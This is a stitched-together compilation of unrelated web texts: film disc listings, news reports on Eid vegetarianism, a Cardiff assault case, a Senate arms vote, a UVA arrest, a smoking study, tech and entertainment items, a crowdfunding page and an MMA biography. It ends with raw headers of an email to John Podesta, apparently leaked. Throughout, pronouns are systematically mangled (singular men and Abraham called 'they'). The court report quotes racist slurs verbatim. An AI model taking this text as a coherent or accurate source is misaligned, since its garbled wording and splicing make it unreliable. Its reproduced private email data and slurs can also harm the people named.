New interviews with Gilliam; producer Lynda Obst; screenwriter Richard La Gravenese; and actors Jeff Bridges, Amanda Plummer, and Mercedes Ruehl
New interviews with artists Keith Greco and Vincent Jefferds on the creation of the film's Red Knight
Interview from 2006 with actor Robin Williams
New video essay featuring Bridges's on-set photographs
Deleted scenes, with optional commentary by Gilliam
Costume tests
Trailers
PLUS: An essay by critic Bilge Ebiri Five Easy Pieces
Following Jack Nicholson's breakout supporting turn in Easy Rider, director Bob Rafelson devised a powerful leading role for the new star in the searing character study Five Easy Pieces. Nicholson plays the now iconic cad Bobby Dupea, a shiftless thirtysomething oil rigger and former piano prodigy immune to any sense of responsibility, who returns to their upper-middle-class childhood home, blue-collar girlfriend (Karen Black, in an Oscar-nominated role) in tow, to see their estranged ailing father. Moving in its simplicity and gritty in its textures, Five Easy Pieces is a lasting example of early 1970s American alienation.
Special Features: New, restored high-definition digital transfer, supervised by director of photography László Kovács, with uncompressed monaural soundtrack on the Blu-ray edition
Audio commentary featuring director Bob Rafelson and interior designer Toby Rafelson
Soul Searching in "Five Easy Pieces," a 2009 video piece with Rafelson
BBStory, a 2009 documentary about the legendary film company BBS Productions, with Rafelson; actors Jack Nicholson, Karen Black, and Ellen Burstyn; directors Peter Bogdanovich and Henry Jaglom; and others
Documentary from 2009 about BBS featuring critic David Thomson and historian Douglas Brinkley
Audio excerpts from a 1976 AFI interview with Rafelson
Theatrical trailer and teasers
PLUS: An essay by critic Kent Jones Valerie and Them Week of Wonders
A girl on the verge of womanhood finds themselves in a sensual fantasyland of vampires, witchcraft, and other threats in this eerie and mystical movie daydream. Valerie and Them Week of Wonders serves up an endlessly looping, nonlinear fairy tale, set in a quasi-medieval landscape. Ravishingly shot, enchantingly scored, and spilling over with surreal fancies, this enticing phantasmagoria from director Jaromil Jire is among the most beautiful oddities of the Czechoslovak New Wave.
Special Features: New 4K digital restoration, with uncompressed monaural soundtrack on the Blu-ray
Three early shorts by director Jaromil Jire: Uncle (1959), Footprints (1960), and The Hall of Lost Steps (1960)
New interview with Czechoslovak film scholar Peter Hames
Interviews from 2006 with actors Jaroslava Schallerová and Jan Klusák
Alternate 2007 psych-folk soundtrack to the film by the Valerie Project, and a new video piece on the music's origins
New English subtitle translation
PLUS: An essay by critic Jana Prikryl
Dear Reader, As you can imagine, more people are reading The Jerusalem Post than ever before. Nevertheless, traditional business models are no longer sustainable and high-quality publications, like ours, are being forced to look for new ways to keep going. Unlike many other news organizations, we have not put up a paywall. We want to keep our journalism open and accessible and be able to keep providing you with news and analysis from the frontlines of Israel, the Middle East and the Jewish World.
Eid Al-Adha, the Festival of Sacrifice, now being celebrated across the Muslim world, is a joyous time of year for believers worldwide. However, for Muslim vegetarians the holiday spirit bears somber overtones.
Arab slaughterhouses overflowed with sheep-toting Muslims on Tuesday, the first day of Eid, when people not only celebrate by eating meat but must purchase an approved animal for sacrifice, such as a cow, camel, sheep or goat.
"I don't like seeing people eat tons of meat during the holiday," Arwa Aburawa, a vegetarian Muslim blogger from Jordan now living in Manchester told The Media Line. "Eating meat is a personal choice, which I respect, but you don't have to overdo it."The holiday commemorates the willingness of the Biblical Abraham to slaughter their son (in the Jewish and Christian tradition, Isaac; in the Muslim tradition, Ishmael) for the sake of God. Eid Al-Adha, also known as "the greater Eid," is celebrated on the 10th day of the last Islamic month of the year. In the Islamic narrative, God appeared to Abraham in a dream, commanding them to sacrifice their only son. With Ishmael under the knife, God called out to Abraham and told them they had passed the test, substituting their son with a ram which Abraham then sacrificed.In the tiny emirate of Abu-Dhabi, some 150 butchers augmented the regular staff of the slaughterhouses to deal with nearly 4,000 animals. Muhammad Al-Marzouqi, head of the slaughterhouse department in Abu-Dhabi's Health Ministry told the Emirati daily Al-Itihad that about 15,000 animals were due to be slaughtered during the 4 day long holiday.In Israel, where about 20% of the population is Muslim, an appliance store offered a free sheep with every purchase of a refrigerator and had the animals gathered in a parking lot for the customer to choose from until health authorities put a stop to it. The mass killing of sheep has aroused the ire of animal right activists in Australia, which this year supplied 800,000 sheep worth $92 million to the Gulf.Visiting Kuwait and Bahrain, activists captured pictures of Australian sheep jammed into car trunks and having their throats cut. Campaigners hoped this will create public pressure back home and bring an end the exports, the Australian Associated Press reported Wednesday.Aburawa said that at first many of their Muslim friends questioned whether they could be both Muslim and vegetarian, but they became more accepting when they explained herself.Aburawa emphasized that they try not to preach vegetarianism, but rather encourage Muslims to consume meat in moderation, preferably from organic sources. They added that Muslims living in the Middle East generally show less understanding to vegetarians than those living in the West."When I became a vegetarian eight years ago, my family in Jordan didn't understand what it was all about," they said. "But, over the years they got over it."The meat sacrificed on Eid Al-Adha is traditionally divided three ways between family members, friends and the poor.Islamic fatwas (legal opinions) tolerate vegetarianism, but do not usually encourage it. "A Muslim may be a vegetarian," South African Mufti Ebrahim Desai is quoted as ruling on IslamicConcern.com, a website advocating Islamic vegetarianism. "However, they should not regard eating meat as prohibited."Liberal clerics, such as American scholar Sheikh Hamza Yusuf, point to Islamic oral traditions to justify vegetarianism."Traditionally Muslims were semi-vegetarians," Yusuf claimed in religious audio tape. "Umar [the second Muslim Caliph] said: 'Beware of meat, because it has an addiction like the addiction of wine'."But overt expressions of vegetarianism are rare in the Arab world. In an incident which sparked international media interest, a young Jordanian woman took to the streets of Amman last July wearing a suit made of lettuce leaves while holding an Arabic sign that read "let vegetarianism grow on you."Muhannad Anati, a Jerusalem resident, said they didn't personally know any Muslim vegetarians."We Muslims don't practice vegetarianism as people know it in the West," they told The Media Line.But where principles don't weigh in, prices often do. The soaring price of meat this year has pushed many Muslims to forced vegetarianism this year. "I'm spending the holiday at my parents' home," they said, "and they ordered in vegetarian pizza."
Join Jerusalem Post Premium Plus now for just $5 and upgrade your experience with an ads-free website and exclusive content. Click here>>
A drunk woman hurled racist abuse at a staff member in a takeaway and left a customer needing stitches after attacking them with a bottle.
Cardiff Crown Court heard Katie Bisgrove, 25, had several previous convictions for violence and racially aggravated offending.
Judge Thomas Crowther QC told her: “You judge by colour. There is no place for that sort of behaviour in our society.”
The court heard the incident occurred around 10pm on Saturday, July 8, at the City Pizza takeaway in City Road in Cardiff.
John Warren, prosecuting, said the defendant went into the takeaway drinking beer and put down a carrier bag containing eight more bottles.
They told the court Saman Salim, who was working behind the counter, noticed the bag was leaking and put it outside, where Bisgrove had gone to sit on the pavement.
Locked up in Wales – August 2017
Prosecutors said the defendant came back inside and said: “Why are you putting my drinks outside you Paki? I'm going to f***ing knock you out you Muslim c***.”
The court heard Mr Salim asked them to leave but they continued to be abusive, telling him: “I'll knock you out with one punch.”
Around 10.30pm Diane and Angelo Stephanakis went into the takeaway after visiting a local pub.
Prosecutors said they noticed the defendant was “kicking off”, throwing takeaway business cards on the floor and being abusive towards staff.
The court heard they pushed Mrs Stephanakis and said: “Get out of the f***ing way.”
Mr Warren said the victim replied “It's excuse me” and Bisgrove shouted “F*** you, you f***ing c***”, before pushing them in the chest and hitting them on the head with a broken glass bottle.
The prosecutor said: “She felt blood flowing down their face.”
(Image: South Wales Police)
The court heard Mr Stephanakis stepped in front of their wife to protect them and the defendant hit them on the shoulder with the broken bottle.
Prosecutors said they took them to the floor and disarmed them but they still wanted to continue the attack.
Mr Warren added: “Both they and their wife were traumatised and in shock.”
The court heard Mrs Stephanakis became disorientated and needed three stitches to the wound on their face.
In their police interview Bisgrove accepted they had been drinking Stella all day but denied making racist comments.
Prosecutors said they had 18 previous convictions, including several for violence and racially aggravated offending.
In April 2011 they received a two-year conditional discharge after calling a taxi driver in Barry a “f***ing Paki c***” following a dispute over a fare.
The court heard in November 2012 they told a woman with their son at Lloyds Bank in Holton Road in Barry: “Go back to your own country.”
In August 2014 they were jailed for 20 weeks after “hurling racist abuse” at a man in a pizza takeaway in Barry and spitting on him.
Bisgrove, from Romilly Road in Canton, Cardiff, admitted using threatening, abusive or insulting words or behaviour and that the offence was racially aggravated.
They also admitted unlawful wounding and assault occasioning actual bodily harm.
Adam Sharp, defending, accepted their client had a “bad record” but argued the incidents were short-lived and there was no pre-meditation.
They told the court Bisgrove's mother died when they were young. They said they later used alcohol as a “coping mechanism”.
The defence barrister added they have been diagnosed with depression and anxiety.
Judge Crowther told the defendant: “What you did is so serious only immediate custody can be justified.”
They were jailed for 20 months.
Senate Minority Leader Charles Schumer Charles (Chuck) Ellis SchumerBrennan fires back at 'selfish' Trump over Harry Reid criticism Trump rips Harry Reid for 'failed career' after ex-Dem leader slams them in interview Harry Reid: 'I don't see anything' Trump is doing right MORE (D-N.Y.) is throwing their support behind a push to block part of President Trump's $110 billion arms sale to Saudi Arabia.
“The human rights and humanitarian concerns have been well documented and are important: of equal concern to me is that the Saudi government continues to aid and abet terrorism via its relationship with Wahhabism and the funding of schools that spread extremist propaganda throughout the world," Schumer said in a statement.
The Senate is expected to vote this week on a resolution of disapproval from Sens. Rand Paul (R-Ky.), Chris Murphy (D-Conn.) and Al Franken (D-Minn.) that would block a small part of the deal signed by Trump during their recent visit to Riyadh.
ADVERTISEMENT
Schumer's backing is a boon for supporters of the new resolution. They previously voted to set aside a similar resolution in 2016.
The senators want to block the sale because they believe selling weapons to Saudi Arabia will worsen the civil war in Yemen, where Saudi Arabia is leading a coalition supporting the ousted government.
Under a frequently overlooked provision in the Arms Export Control Act, lawmakers can force a vote on a deal after 10 calendar days.
The resolution is expected to fail, but Murphy told reporters late last month that they would have "significantly more support" than the 2016 resolution.
Smoking Linked with Increased Risk of Most Common Type of Breast Cancer
Young women who smoke and have been smoking a pack a day for a decade or more have a significantly increased risk of developing the most common type of breast cancer. That is the finding of an analysis published early online in Cancer, a peer-reviewed journal of the American Cancer Society. The study indicates that an increased risk of breast cancer may be another health risk incurred by young women who smoke.
The majority of recent studies evaluating the relationship between smoking and breast cancer risk among young women have found that smoking is linked with an increased risk; however, few studies have evaluated risks according to different subtypes of breast cancer.
To investigate, Christopher Li, MD, PhD, of the Fred Hutchinson Cancer Research Center in Seattle, and their colleagues conducted a population-based study consisting of 778 patients with estrogen receptor positive breast cancer and 182 patients with triple-negative breast cancer. Estrogen receptor positive breast cancer is the most common subtype of breast cancer, while triple-negative breast cancer is less common but tends to be more aggressive. Patients in the study were 20 to 44 years old and were diagnosed from 2004-2010 in the Seattle-Puget Sound metropolitan area. The study also included 938 cancer-free controls.
The researchers found that young women who were current or recent smokers and had been smoking a pack a day for at least 10 years had a 60 percent increased risk of estrogen receptor positive breast cancer. In contrast, smoking was not related to a woman's risk of triple-negative breast cancer.
“The health hazards associated with smoking are numerous and well known. This study adds to our knowledge in suggesting that with respect to breast cancer, smoking may increase the risk of the most common molecular subtype of breast cancer but not influence risk of one of the rarer, more aggressive subtypes,” said Dr. Li.
Jay-Z and Kendrick Lamar may have gotten the most nominations, but Marin musicians are also among the nominees announced Tuesday for the 60th Grammy Awards.
Metallica snagged a couple of nominations — for Best Rock Album for “Hardwired to Self-Destruct,” and band founders Lars Ulrich and James Hetfield grabbed a nomination for Best Rock Song for “Atlas, Arise.”
Longtime West Marin resident Elvin Bishop was nominated for Best Traditional Blues Album for “Elvin Bishop's Big Fun Trio.”
The Grateful Dead documentary “Long Strange Trip” was nominated for Best Music Film. It was directed by Amir Bar-Lev and Marin's Justin Kreutzmann, son of Grateful Dead drummer Bill Kreutzmann, was one of its video producers.
The 60th Grammy Awards airs live from New York's Madison Square Garden Jan. 28 on CBS.
I stand with Martese Johnson. There is no excuse for this. @VirginiaABC you should be ashamed. pic.twitter.com/4j3bnfDlBI — UVAProblems (@UVAProbs) March 18, 2015
UPDATE: 6:50 PM EST:
University of Virginia President Theresa A. Sullivan has released a statement following the arrest of UVA honor student Martese Johnson.
Dear Students, Faculty and Staff:
I write to express my deep concern about an incident that occurred on The Corner early this morning and to provide information about immediate steps that I have taken in response.
At about 12:45 a.m., one of our students was injured while Virginia Alcoholic Beverage Control (ABC) agents were attempting to take them into custody on the sidewalk in front of Trinity Irish Pub. University Police and Charlottesville Police arrived on the scene shortly after the incident occurred. We have not yet clarified all of the details surrounding this event, but we are seeking to do so as quickly as possible.
This morning I met with Charlottesville Police Chief Tim Longo and University Police Chief Mike Gibson in an effort to learn more about the incident. Furthermore, because ABC is a state agency, I contacted the Governor's office to ask for an independent investigation of the incident. In response, the Governor has asked the Secretary of Public Safety to initiate an independent Virginia State Police investigation into the use of force in this matter.
As the investigation unfolds, eyewitnesses will play an essential role in shedding light on the details of this incident. I urge students and other members of our community who witnessed the incident or have other direct knowledge of it to come forward. Please contact the Virginia State Police at 1-800-552-0963 immediately.
The safety and security of our students will always be my primary concern, and every member of our community should feel safe from the threat of bodily harm and other forms of violence. Today, as U.Va. students, faculty, and staff who share a set of deeply held values, we stand unified in our commitment to seeking the truth about this incident. And we stand united in our belief that equal treatment and equal justice are among our fundamental rights under the law.
Teresa A. Sullivan
President
Marcus L. Martin — Vice President for Diversity & Equity and Professor of Emergency Medicine — and Maurice Apprey — Dean, African-American Affairs, Professor of Psychiatry — also released a statement condemning the use of force and the arrest.
We are outraged by the brutality against a University of Virginia undergraduate student that occurred in the early hours Wednesday, March 18, 2015. This African American male student was injured on the Corner, after being stopped by Virginia Department of Alcohol Beverage Control (ABC) officers. Their head was slammed into the hard pavement with excessive force. The student required medical evaluation and treatment at the UVa Hospital Emergency Department. This was wrong and should not have occurred. In the many years of our medical, professional and leadership roles at the University, we view the nature of this assault as highly unusual and appalling based on the information we have received.
This incident is now being handled at the highest level of the University and the State of Virginia. We have spoken with student leaders and are sensitive to the collective remorse and reactions of the University and community. We are asking everyone to exercise sound judgment and discretion, as we seek to protect the student's rights and privacy. The Office for Diversity and Equity and the Office of African-American Affairs (OAAA) are available to provide support. This evening, the Office of African-American Affairs (OAAA) will be open until 8:00 pm to provide support. As we wait to learn more about what happened last night, please know you can call us to talk about this situation and your concerns.
Read their statement in its entirety, here.
————–
A black University of Virginia student was arrested and reportedly beaten in front of classmates by police over an ID discrepancy early Wednesday morning.
Witnesses say Martese Johnson, a third-year honor student and member of the historically black fraternity Kappa Alpha Psi, did not resist arrest when state Alcoholic Beverage Control agents approached him. The incident left them bruised and bloodied — the school paper, the Cavalier Daily, writes that the young man sustained a head wound that required 10 stitches.
The above picture — an image of Johnson bloodied and handcuffed — is circulating the internet along with an email penned by UVA's “Concerned Black Students” that details Johnson's experience and calls for a thorough investigation into the incident.
You can read the letter in its entirety below:
This morning Martese Johnson emerged with a head injury requiring 10 stitches.
They were brutalized by Virginia ABC law enforcement outside of Trinity Irish Pub. Their face was bloodied. Their body was bruised.
Outside of the doors of Trinity Irish Pub, a mass of University students bore witness to the officer's animalistic, insensitive, and brute handling of Martese. They were left with their blood splattered on the pavement of University Avenue.
Today, we are reminded of the gruesome reality that we are not immune to injustice; as University students, we are not impervious to the brutality that has reeled on news cycles around the country. We have marched and shouted that we are Trayvon Martin and Michael Brown, but the proximity of this morning's brutality to a member of our community has deepened that wound. It is no longer happening only on national television—it is a reality here and now at the University of Virginia that we must face as a collective.
After Martese was denied entry to the bar, they found themselves suddenly flung to the ground. The brutish force used resulted in their head and bodily injuries. Their treatment was unprovoked as they did not resist questioning or arrest. In confusion, with blood painting their face and creating a pool on the bricks of the corner, they yelled out for mercy. Though they lay bleeding and crying out, officers continued to hold them to the pavement, pinning them down, twisting their arm, with knees to their back until they were handcuffed.
As students pleaded with officers to lift Martese from the ground they were pushed away, and some were even handcuffed and threatened with possible arrest if they did not leave the scene.
We demand there be a swift and thorough investigation on the state, local, and University levels. We have seen what happens at the University when we allow problems we have long known exist to be handled quietly, so we will not be quiet. We demand noise from each other, noise from professors, noise from administrators. Martese, like any other student at this university, like any other person in this country and in this world, deserves more than our uproar: they deserve follow through and intentional action.
Look forward to a follow-up email regarding further plans and actions.
Sincerely,
Concerned Black Students
While UVA officials have yet to comment on the alleged beating, UVA Dean Allen Groves took to Twitter to announce that a statement would be released soon.
President Sullivan, I and others hear your concerns – action has been and is taking place. They will issue a statement later today — Allen Groves (@UVADeanGroves) March 18, 2015
According to the Cavalier Daily, Johnson was “arrested on charges of resisting arrest, obstructing justice without threats of force, and profane swearing or intoxication in public.” The arresting officer, Alcohol and Beverage Control special agent J. Miller, said the young man “was very agitated and belligerent but [has] no previous criminal history,” the Cavalier writes.
Bryan Beaubrun, a fourth-year UVA student, told the student newspaper the police wrestled Johnson to the ground.
“Martese was talking to the bouncer and there was some discrepancy about their ID,” Beaubrun said. “[An] ABC officer approaches Martese and grabs them by the elbow…and pulls them to the side…I was shocked that it escalated that quickly. Eventually [he was] on the ground, they're trying to put handcuffs on them and their knees were on their back.”
A video of Johnson's arrest can be watched below. In the video, captured by bystanders, Johnson can be heard calling the police officer a racist as he's being held down.
Johnson, who is expected to appear in court on March 26, was held on $1,500 bail and released Wednesday morning.
A march from campus to the police department will take place in Charlottesville at 8:00 p.m.
NewsOne has reached out to UVA officials and Charlottesville police for comment.
SOURCE: Cavalier Daily, Twitter
Also On News One:
MSI has pulled the wraps off its neat-looking Cubi N mini-PC, a tiny box with a Braswell SoC and no fans. Intel's Celeron N3150 does the heavy lifting with four cores running at 1.6 GHz base and 2.08 GHz turbo clocks.
The Cubi N comes with 4GB of DDR3 RAM standard, which users can upgrade to 8GB. Storage spots include room for an mSATA SSD, as well as a 2.5" SSD or mechanical hard drive. Four USB 3.1 ports provide peripheral connectivity at speeds up to 5Gbps. One of the front-panel USB 3.1 ports can deliver extra juice for device-charging purposes, too.
For networking needs, MSI offers an Intel 3165 802.11ac Wi-Fi adapter and a Gigabit Ethernet port. Bluetooth 4.0 support is available as an option. MSI's choice of display outputs is a bit puzzling—we get one HDMI and one VGA output, but no DisplayPorts.
The tiny box has a volume of only 0.45 liters and measures 4.6" x 4.4" x 1.8" (116 x 112 x 45mm). MSI throws in a Windows 10 Home license, too.
Image copyright AP Image caption Mexican stamps from 2006. El Chapulin Colorado inspired The Simpson's Bumblebee Man
One of Latin America's most beloved comic actors, Roberto Gomez Bolanos, has died at the age of 85.
Known as Chespirito (Little Shakespeare), the Mexican's work delighted children over four decades.
Their characters included El Chapulin Colorado, the inspiration behind The Simpsons' Bumblebee Man.
Gomez Bolanos, who died at home in the resort of Cancun, appeared in several movies and plays. Their live shows played to packed out stadiums.
Their television work was exported to 90 countries, translated into dozens of languages, and still shows today.
The cause of death was not immediately known.
Mexican President Enrique Pena Nieto tweeted that the country had lost an "icon whose work transcended generations and borders".
Chespirito themselves had some 6.6 million Twitter followers.
Their nickname stemmed from their short stature.
Image copyright AP Image caption Chespirito in 2008. They said they always "tried to be as concise as possible"
In 2011 they said: "Nicknames are the most essential in life, more valuable than names."
One of Gomez Bolanos's biggest hits was the show El Chavo del Ocho, about a naive child who hides in a barrel.
The Chapulin Colorado, or Red Grasshopper, character was a comic superhero whose red and yellow outfit and hood which bore antennae inspired The Simpsons' Bumblebee Man.
The superhero's catchphrases included: "You didn't count on my cleverness" and "All the good people, follow me."
Gomez Bolanos said in 2005: "I always tried to be as concise as possible, all to try and reach everyone, but especially the simple people, those who needed to be reached more than anyone else."
Gomez Bolanos is survived by their second wife, Florinda Meza, six children from their first marriage and 12 grandchildren.
Your ultra-high-definition television will soon offer even more eye-popping entertainment — of the adults-only variety. According to the Wall Street Journal, pornographic film company Naughty America plans to spend hundreds of thousands of dollars to upgrade its shooting to 4K — meaning adult flicks with crisper, clearer, more up-close-and-personal resolution.
The small company's maneuver into 4K shooting won't be easy. Andreas Hronopoulos, the company's chief executive, told the WSJ that the investment was significant enough to sink the company if UHD technology didn't take off, largely because of the significant costs associated with the storage and editing processes necessary for 4K footage. "The closer we can come to making it feel like you're there, the more successful we are," Hronopoulos said. "Our customers want to get as close to reality as they can get, without reality getting in the way."
"Our customers want to get as close to reality as they can get."
Naughty America isn't the first adult filmmaker to get into the 4K game. As The Verge reported last year, newly-launched website Huccio.com touted itself as the first to offer 4K erotic content, and tech-savvy company Pink Visual is investigating the feasibility of 4K videos. Other producers, however, seem intent on waiting to see whether 4K takes off among consumers before biting the bullet: one survey showed that 40 percent of those in the adult industry didn't think the technology would do much for business.
Still, Naughty America's decision also reflects broader interest in 4K among content providers and distribution services more generally. At last week's CES, Amazon announced a slew of impressive 4K partnerships with providers including Warner Bros. and Lionsgate — all of which will be available on Amazon Instant Video to those who own Samsung 4K televisions. Samsung also announced 4K partnerships with Comcast, DirecTV, and Netflix, while Sony has been pushing 4K entertainment since it last year launched the world's first 4K video distribution service.
About
*PATENT PENDING*
THE STORY
The XGear team travels often and found other MacBook cases lacking. We created the Karion as a feature-rich case that combines style and practicality. Trying to juggle tickets, a MacBook, a phone, and a carry-on (yes, that's how we came up with the name) was difficult with cases with no handles. With the Karion, instead of having to carefully put away an expensive MacBook, you simply close up the case and throw the strap over your shoulder. We found this made traveling much easier and more enjoyable. The team sat down and laid out the criteria including:
Compact briefcase handles
Magnetic locking latch
Ventilation to help maximize cooling
Collapsible kickstand for comfortable use
Reliable D-rings for quick-release shoulder strap
Slim enough to fit into most backpacks and briefcases
We considered many variations on handles before choosing the final design.
Our design team tried out different kickstand configurations to find the most durable and useful one.
MEET THE XGEAR KARION
The Karion features an innovative, patent pending design that is both practical and stylish. Lined with a finely stitched Black Faux Leather exterior with a black nano-suede inner lining, the Karion will protect your MacBook Pro 13" or 15" Retina while giving it a few special features it does not already have, such as collapsible handles, a locking latch for safe and secure transport, a convenient & removable shoulder strap so your hands can be free to carry other items, and a built-in collapsible kickstand to elevate your laptop for easy typing and more effective cooling.
KARION BENEFITS
Stylish faux leather outer shell
Soft suede inner lining
Collapsible handles that stow away with magnets when not in use
Quick-connect loops for attaching shoulder strap
Matching shoulder strap with durable nylon band
Hidden kickstand for comfortable typing
Ample space for access to all ports and functions of your MacBook
Metal mesh screen that allows proper ventillation
Suede palmrest to keep your MacBook clean
Magnetic latch keeps Karion closed
Elastic bands secure the Karion to your MacBook's screen
Protects your MacBook without adding bulk
The Karion incorporates many useful features that will make traveling with your Karion easy.
A collapsible kickstand provides you with an elevated and more comfortable typing position.
Soft suede lining keeps your palms comfortable while typing and keeps your MacBook clean.
A quick-release shoulder strap allows convenient and comfortable transportation.
Mesh screen allows for your MacBook to remain cool and reduces risk of overheating.
Fold-away handles make transportation effortless without adding bulky, unattractive handles.
Give your MacBook the elegant look of black leather with white stitching and a small metallic XGear badge.
KARION DIMENSIONS
The Karion (patent pending) perfectly balances protection and size, fully covering your MacBook while adding minimal thickness.
PLEDGES
WHERE WE ARE
Our current Karion model is only offered in Carbon Fiber. After much customer demand we have decided to offer the Karion in Black Faux Leather as well for a more professional and executive look.
Passing our goal and being funded more will help us create further models of the Karion in Black Faux Leather for other MacBook models such as the 13", 15", and 17" MacBook Pros, and the 11" and 13" MacBook Airs! Be sure to let us know if you're interested in these models!
WHAT'S LEFT TO DO
In order to begin production on the Karion, we need $10,000.
What does the $10,000 pay for?
First production run
Mold for MacBook Pro 13" Retina
Material
Packaging
Tooling
PRODUCTION
We have spent a long time figuring out the essential and most useful features in a MacBook carrying case and have now designed a multifunctional case. The next step is to bring the Karion to life with your help and funding. XGear works closely with our manufacturing partners to ensure that we maintain rigorous quality standards to give you the best possible product.
WHO WE ARE
American mixed martial arts fighter
Brian Foster (born April 3, 1984) is an American mixed martial artist and kickboxer currently competing for the Professional Fighters League. A professional since 2006, they have also competed for the UFC. They won the WSOF Lightweight Tournament in 2015.
Background [ edit ]
Foster began their professional MMA career in 2006, after their brother died. In an interview with FightLockdown.com, Foster stated that "martial arts have changed me, it's made me a more humble and respectful individual. My brother's death did make me a very angry person, so very shortly after it happened, I started training and used the physical stress of training to cancel out the emotional pain caused by their death. I like to think they are very proud of what I have accomplished since their passing [...] I take a photo of my brother with me to every fight."[1]
Mixed martial arts career [ edit ]
Early career [ edit ]
Foster got their start fighting for the Masters of the Cage company. Foster fought six times for the promotion and went 4–2 and won eight consecutive fights before losing to future The Ultimate Fighter winner, Diego Brandão. Foster bounced back and won their next three fights before getting signed by the Ultimate Fighting Championship.
Ultimate Fighting Championship [ edit ]
At UFC 103, Foster was set to make their debut against highly regarded Englishman, Paul Daley. Daley replaced Mike Swick in a fight with Martin Kampmann, leaving Foster without an opponent. Instead of Daley, they ended up fighting Rick Story and lost via arm-triangle choke submission in the second round.[2]
At UFC 106 on November 21, 2009, Foster defeated Brock Larson by TKO in the second round after taking an illegal kick to the head and an illegal knee to the head in the first round.[3]
Foster stepped in for an injured Dong Hyun Kim at UFC 110 to face Chris Lytle.[4] They lost due to a kneebar submission in the first round.
Foster next faced Forrest Petz on September 15, 2010 at UFC Fight Night 22.[5] They won in the first round by TKO.
Foster then faced Matt Brown at UFC 123, replacing an injured Rory MacDonald.[6] Foster won the fight by guillotine choke submission in the second round.
In 2010, an inadvertent groin strike sustained during training burst Foster's testicle and it had to be surgically removed. Later, when they were cleared to continue training for upcoming Pierson fight at UFC 129, a pre-fight MRI showed clear signs of a brain hemorrhage. The second MRI taken of their brain showed no signs of hemorrhage. However, Foster was left without a fight and subsequently they were released from UFC. According to Foster, there was miscommunication in the media leading to reports of them going through a brain surgery but Foster stated they were false.[7][8][9]
Now fully recovered, Foster's next fight was against Jack Mason at Cage Warriors Fighting Championship 44.[10] They won the fight by standing guillotine choke submission in the first round.
Foster defeated LaVerne Clark via first-round submission at Capital City Cage Wars 7 on October 15, 2011.[11]
World Series of Fighting/Professional Fighters League [ edit ]
Foster joined the World Series of Fighting in 2014. In their first fight for the promotion, Foster faced Jake Shields in the main event of WSOF 17 on January 17, 2015. They lost the fight via submission in the first round.
In their second fight for the promotion, Foster defeated LaRue Burley via knockout with a right hook at 34 seconds of the first round at WSOF 23 on September 18, 2015.
Foster then entered WSOF's one night Lightweight tournament to determine the number one contender for the Lightweight Championship.[12] They faced Joáo Zeferino in the quarter finals and lost via submission due to a heel hook. However, a number of injuries plagued the semifinalists and Foster continued as an injury substitution. They faced Luis Palomino in the semifinals and won via TKO in the second round. In the finals, they faced Zeferino in a rematch and won the fight via knockout in the second round to win the tournament.[13]
Foster faced Luiz Firmino at WSOF 33 on October 7, 2016.[14] They won the fight via triangle choke submission in the first round.
Foster faced Jon Fitch in a welterweight title bout on June 30, 2017 at Professional Fighters League 36: Fitch vs. Foster. They lost the fight in the second round due to submission.
Foster faced Ramsey Nijem in the initial round of Professional Fighters League's lightweight tournament. Foster won the fight via ground and pound, stemming from a flying knee to Nijem's head.[15]
Kickboxing [ edit ]
Foster made their debut as a kickboxer and Glory fighter at GLORY 11 in Hoffman Estates, Illinois on October 12, 2013.[16] They lost via TKO in the first round following a spinning heel kick from Raymond Daniels.[17]
Kickboxing record [ edit ]
Professional kickboxing record 0 wins (0 KOs), 1 losses, 0 draws Date Result Opponent Event Location Method Round Time Record 2013-10-12 Loss Raymond Daniels Glory 11: Chicago Hoffman Estates, Illinois, USA TKO (right spinning heel kick) 1 2:24 0–1
Legend: Win Loss Draw/No contest Notes
Championships and accomplishments [ edit ]
Mixed martial arts record [ edit ]
Professional record breakdown 39 matches 28 wins 11 losses By knockout 14 2 By submission 13 9 By decision 1 0
Download raw source
Delivered-To: john.podesta@gmail.com Received: by 10.25.43.68 with SMTP id r65csp1767414lfr; Tue, 6 Oct 2015 14:20:03 -0700 (PDT) X-Received: by 10.60.140.132 with SMTP id rg4mr23710611oeb.70.1444166402960; Tue, 06 Oct 2015 14:20:02 -0700 (PDT) Return-Path: <mfisher@hillaryclinton.com> Received: from mail-oi0-x22c.google.com (mail-oi0-x22c.google.com. [2607:f8b0:4003:c06::22c]) by mx.google.com with ESMTPS id o124si16535200oig.29.2015.10.06.14.20.02 for <john.podesta@gmail.com> (version=TLSv1.2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128); Tue, 06 Oct 2015 14:20:02 -0700 (PDT) Received-SPF: pass (google.com: domain of mfisher@hillaryclinton.com designates 2607:f8b0:4003:c06::22c as permitted sender) client-ip=2607:f8b0:4003:c06::22c; Authentication-Results: mx.google.com; spf=pass (google.com: domain of mfisher@hillaryclinton.com designates 2607:f8b0:4003:c06::22c as permitted sender) smtp.mailfrom=mfisher@hillaryclinton.com; dkim=pass header.i=@hillaryclinton.com; dmarc=pass (p=NONE dis=NONE) header.from=hillaryclinton.com Received: by mail-oi0-x22c.google.com with SMTP id i136so111274936oib.3 for <john.podesta@gmail.com>; Tue, 06 Oct 2015 14:20:02 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=hillaryclinton.com; s=google; h=mime-version:date:message-id:subject:from:to:content-type; bh=asMFGtlY7vaHrGV417uvuiUUF3x2whRESQcr3y7C0pI=; b=hsyj9hBIDS2rS+8f80UwR9wimR5YiiQi9WAOzDEd4VLCkhh7k6UkkOky0ZEQy0LsE4 pqCfMitTOtLZt2ZiYijKwxFOmUQceIzbAO+Lc2RoS1krfA7t8EnkvxauucVvJxCyUtkf kHN1QEEOb/OVkLj9ucHJN/wFU0aVwTOhDsH0M= X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:mime-version:date:message-id:subject:from:to :content-type; bh=asMFGtlY7vaHrGV417uvuiUUF3x2whRESQcr3y7C0pI=; b=hvr1d8z2lMSJ3++pCZ19ITPVFsJbEUDIVKN4k2yA7uCY19/pXm2Ztqm2RE3A+xojlJ VKsfh5OfCKKvrIeNHjeLW8uOcKm05OKkfH12mvrlSikh0tpZWfNg2gqFzkDAvw5F9TZF PsgPZJ1U0ih0FCt0R7w2cVtG/rLBvgp6gE2Gs/YOfxTlKEsYKRh8JmA+21tSYpTNAxfh NFo+QKHGMdk1Snebb8kCSOCOHVqaKnSHJ2yN3fPkwAEFfE33HmUO5hdTaaptaSIpn3cN 